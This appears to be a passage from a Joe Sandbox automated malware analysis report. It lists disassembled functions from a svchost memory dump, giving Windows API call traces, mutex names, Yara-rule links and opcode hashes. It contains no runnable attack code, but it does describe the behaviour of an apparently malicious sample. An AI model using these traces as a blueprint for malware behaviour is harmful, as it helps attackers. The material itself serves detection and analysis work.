                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
                                                                                                                                                                                                              • API String ID: 1370207991-2011349651
                                                                                                                                                                                                              • Opcode ID: e5b9de26df3e8d6b63ff616afb433464a903035fd8d153d40fa9b72db8e09c5b
                                                                                                                                                                                                              • Instruction ID: 4f732c3713136276407563d4ced4ec09ae15b998e7d0353052f2f0fcc99f3ab9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5b9de26df3e8d6b63ff616afb433464a903035fd8d153d40fa9b72db8e09c5b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41F0E930D93214F7E31157A59C09F9F7BAC9F08B86F440655F909E5180D7E04711C6E1
                                                                                                                                                                                                              Function 02CAB980 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33synchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02CAB98E
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CB59EE
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02C95DE8,?,?,02C95DE8,?,00000001), ref: 02CB5A0B
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: SetNamedSecurityInfoA.ADVAPI32(?,02C95DE8,00000010,00000000,00000000,00000000,00000001), ref: 02CB5A26
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: LocalFree.KERNEL32(?,?,?,02C95DE8,?,00000001), ref: 02CB5A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014},00000006), ref: 02CAB9AB
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAB9B2
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAB9C4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAB9D5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
                                                                                                                                                                                                              • API String ID: 1370207991-2598904463
                                                                                                                                                                                                              • Opcode ID: b6ec345f8fe5e89c050eeed817a036dda887942aa6945813898877b4c1dc1ab0
                                                                                                                                                                                                              • Instruction ID: fe502d258010cf381e25fc175d84fd1acd8088f529eedca821ab205f487659fb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6ec345f8fe5e89c050eeed817a036dda887942aa6945813898877b4c1dc1ab0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7F0A730DC3219B7F7216BA69D0DF9E7B6CAF05B9AF400642F905E61C0DBB15A14C6E1
                                                                                                                                                                                                              Function 02CB9680 Relevance: 10.1, APIs: 8, Instructions: 95memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02CB96E6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CB96ED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CB96FA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CB9701
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02CB9710
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CB9713
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CB9720
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CB9723
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: c91faf8699e5d3f9ede83349c00d206886a81c648f6c50941e2ba5d4428cc462
                                                                                                                                                                                                              • Instruction ID: 201c5c7692fbb55e12d6d6c27d5ca4f7670b698f2e391d24a91f4a64da00e425
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c91faf8699e5d3f9ede83349c00d206886a81c648f6c50941e2ba5d4428cc462
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3831B371A01304ABDB219F69C848BDBBBB8EF85314F048949ED19EB241D731EA50CBE0
                                                                                                                                                                                                              Function 02CB9880 Relevance: 10.1, APIs: 8, Instructions: 56COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1186645d0c75b85de98526e47af18d9fe8354d88ea576be7dafbbf4eb3d33ec1
                                                                                                                                                                                                              • Instruction ID: fa75da3ec91bba85beb4d574018028363460bf0af4c94ec218f2ab84a0d8b381
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1186645d0c75b85de98526e47af18d9fe8354d88ea576be7dafbbf4eb3d33ec1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A017571A86204ABDF21ABE5EC88F977B5CEF84765F404A23FA05DB140C7369510CAF0
                                                                                                                                                                                                              Function 02CBE6CA Relevance: 9.1, APIs: 6, Instructions: 141fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,00000004,?,00000000,00000000), ref: 02CBE56F
                                                                                                                                                                                                              • MoveFileA.KERNEL32(?,?), ref: 02CBE75D
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CBE7A1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CBE813
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AttributesCreateDirectoryMovefree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1026147201-0
                                                                                                                                                                                                              • Opcode ID: 59ee3eec59f6cbda8afbb8a0d0670c1443450acd5bdca51b0c88ed713fd5672e
                                                                                                                                                                                                              • Instruction ID: 7fd2ff860c7a4afc99a99f716b8c371a5ad481e2937e9f05cb43565a3091dd1f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59ee3eec59f6cbda8afbb8a0d0670c1443450acd5bdca51b0c88ed713fd5672e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE4168309043598FCF228F788C84BEA7FA49F96740F9049A9E682D7241DB318649CBA0
                                                                                                                                                                                                              Function 02CB8AB0 Relevance: 9.1, APIs: 6, Instructions: 108fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02CB8AF4
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02CB9447), ref: 02CB8B0E
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CB8B36
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?,02CB9447), ref: 02CB8B42
                                                                                                                                                                                                                • Part of subcall function 02C97310: GetHandleInformation.KERNEL32(?,00000000), ref: 02C97324
                                                                                                                                                                                                                • Part of subcall function 02C97310: CloseHandle.KERNEL32(?), ref: 02C97335
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CB8B6E
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00140B17,02CB9447,00000000,00140B17), ref: 02CB8BA0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3741995677-0
                                                                                                                                                                                                              • Opcode ID: e30b2d0bb218e8d29757cf7c33b6371234d3031152b5ea954b8dd5b304def9e9
                                                                                                                                                                                                              • Instruction ID: 8c2aeb4996da59196f1645089a9e2f7f85f27fa99982855ff531fe8fe2c9ca5b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e30b2d0bb218e8d29757cf7c33b6371234d3031152b5ea954b8dd5b304def9e9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4318DB1A41209BBD710DF99DC84BAAF7ACFF58714F10825AEA0497740D770AE64CBE0
                                                                                                                                                                                                              Function 02C98820 Relevance: 9.1, APIs: 6, Instructions: 90synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdiFlush.GDI32(00000000,?,00000000), ref: 02C988B6
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C988C4
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,?), ref: 02C988DA
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(00000000,?), ref: 02C988E6
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C988F3
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C98915
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3485819771-0
                                                                                                                                                                                                              • Opcode ID: 57775370c15e198b73ed905fa755db1cee60f1310eb1531ccee852ae4c6a1f18
                                                                                                                                                                                                              • Instruction ID: 34c3f5600d0c12b16566c8b57b6de2f850b7a4e50c54893d60ee9e5f00acdb4b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57775370c15e198b73ed905fa755db1cee60f1310eb1531ccee852ae4c6a1f18
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C31E431E411049FCF10CF29D988B9A7BBAAFC9354B148A69E905DB340D731E911CBA0
                                                                                                                                                                                                              Function 02C92850 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexitfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3367576030-0
                                                                                                                                                                                                              • Opcode ID: 632abb223e58cdbbc1192c64d10b5c94514d3b34f90ac1d6f6d64ab6dc626ae3
                                                                                                                                                                                                              • Instruction ID: eceb8347263049b1fe7f45ea95dae72184f0082984bec2180cd859c648ef705f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 632abb223e58cdbbc1192c64d10b5c94514d3b34f90ac1d6f6d64ab6dc626ae3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27212BB6A00719AFDB10CF58DC85BAB77A8FF88350F144529ED4997340D7B1AE108BA1
                                                                                                                                                                                                              Function 02CB52D0 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02CB52EB
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02CB531C
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 02CB5338
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 02CB533E
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02CB534C
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02CB5364
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1800058468-0
                                                                                                                                                                                                              • Opcode ID: e8f502038ece3d40dedcd00e9571e02f1b3db5733c0f01e8b7f9dbda79317919
                                                                                                                                                                                                              • Instruction ID: 5f48c07142ec5ca195b64fcd4b02eef9b55d0d19b1ca66639a3eeab3abd7a54f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8f502038ece3d40dedcd00e9571e02f1b3db5733c0f01e8b7f9dbda79317919
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8119472B803097FE72196589CC6FEE7768EF80B90F904915FB08EA1C0D7E1E951C6A4
                                                                                                                                                                                                              Function 02CA2E80 Relevance: 9.1, APIs: 6, Instructions: 63memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02CA2E8E
                                                                                                                                                                                                              • GetWindowTextA.USER32(00000000,?,00000104), ref: 02CA2EA9
                                                                                                                                                                                                                • Part of subcall function 02CA2570: memset.MSVCRT ref: 02CA2587
                                                                                                                                                                                                                • Part of subcall function 02CA2570: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,74DEF550,00000000), ref: 02CA259E
                                                                                                                                                                                                                • Part of subcall function 02CA2570: PathAddBackslashA.SHLWAPI(?,?,74DEF550,00000000), ref: 02CA25AB
                                                                                                                                                                                                                • Part of subcall function 02CA2570: PathFileExistsA.SHLWAPI(?,?,74DEF550,00000000), ref: 02CA25E7
                                                                                                                                                                                                                • Part of subcall function 02CA2570: lstrcpynA.KERNEL32(02CE9F08,00000000,00000104,00000000,00000001,?,74DEF550,00000000), ref: 02CA2611
                                                                                                                                                                                                                • Part of subcall function 02CA2570: GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02CA2620
                                                                                                                                                                                                                • Part of subcall function 02CA2570: HeapValidate.KERNEL32(00000000,?,74DEF550,00000000), ref: 02CA2623
                                                                                                                                                                                                                • Part of subcall function 02CA2570: GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02CA2630
                                                                                                                                                                                                                • Part of subcall function 02CA2570: HeapFree.KERNEL32(00000000,?,74DEF550,00000000), ref: 02CA2633
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA2F07
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA2F0A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA2F17
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA2F1A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Path$FreeValidate$AncestorBackslashExistsFileFolderTextWindowlstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 649337724-0
                                                                                                                                                                                                              • Opcode ID: 54f49ed89da136e851f3f32eed9a5619061a0ed9bfcd79aa38fd94a1f0386437
                                                                                                                                                                                                              • Instruction ID: 32f59b08ddac68261e419c1987a103ba9d0e00982a154f47121517f2f745ca67
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54f49ed89da136e851f3f32eed9a5619061a0ed9bfcd79aa38fd94a1f0386437
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA110A71E4426667DB309B309C38BE73BADEB95349F444A50EC84D7180EB71D984C7A2
                                                                                                                                                                                                              Function 02C9BAA1 Relevance: 9.0, APIs: 6, Instructions: 46synchronizationthreadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C9BAAF
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9BAD4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9BAE2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 02C9BB17
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9BB1E
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C9BB2E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1675675969-0
                                                                                                                                                                                                              • Opcode ID: 0f0fd70cc431ee30a3630e7595d763c12c8dc1ca706513071168525b6fb68664
                                                                                                                                                                                                              • Instruction ID: 49a3ea94d99073266cf895cdf239f4d9dff9ac1dc6ccde0d3955728729df207b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f0fd70cc431ee30a3630e7595d763c12c8dc1ca706513071168525b6fb68664
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD01D231A83210ABCB049F24F80CFD933A0BF84769F454BA9E905DB2C1D3B168038F90
                                                                                                                                                                                                              Function 02C9B920 Relevance: 9.0, APIs: 6, Instructions: 37synchronizationthreadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C9B92D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9B94B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 02C9B980
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9B987
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C9B99B
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000005), ref: 02C9B9AA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentErrorLastMessageMutexObjectReleaseSendSingleThreadWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 699575883-0
                                                                                                                                                                                                              • Opcode ID: 70077efd0e21e8930c6ef088d445e9c212e3e59e4f35ea467dff59f2e26853a2
                                                                                                                                                                                                              • Instruction ID: 791181a2bd609e225f6114045c42539b95a5a8aff0effc8128987ef102658883
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70077efd0e21e8930c6ef088d445e9c212e3e59e4f35ea467dff59f2e26853a2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2001A234A83210AFD7149F24E80CBE537A0FB4931AF818BA8E515DB2D0D7B16451CF94
                                                                                                                                                                                                              Function 02C9CBF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowRect.USER32(02C9CD24,00000000), ref: 02C9CBFF
                                                                                                                                                                                                              • GetWindowLongA.USER32(02C9CD24,000000F0), ref: 02C9CC19
                                                                                                                                                                                                              • GetScrollBarInfo.USER32(02C9CD24,000000FA,?), ref: 02C9CC34
                                                                                                                                                                                                              • GetScrollBarInfo.USER32(02C9CD24,000000FB,0000003C), ref: 02C9CC61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoScrollWindow$LongRect
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 4167475372-4251816714
                                                                                                                                                                                                              • Opcode ID: a41872d1651ba1667f3429c7b0b33cb39c5d9e07556e920b1892bfedc061623d
                                                                                                                                                                                                              • Instruction ID: b99f285539d0130a48d8882ea34561c4b06ca3357befd3b888cfea9d592208b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a41872d1651ba1667f3429c7b0b33cb39c5d9e07556e920b1892bfedc061623d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6331E7B0901B05AFC724CF6AD588A56FBF5BF88315B508A1EE49A93B60D730F550CF90
                                                                                                                                                                                                              Function 02CD41A0 Relevance: 8.8, APIs: 7, Instructions: 78COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CD41AB
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CD41C1
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,000000FF,?), ref: 02CD41D3
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CD41EF
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,?,000000FF,?), ref: 02CD420E
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,?,000000FF,?), ref: 02CD421C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: freemalloc
                                                                                                                                                                                                              • String ID:
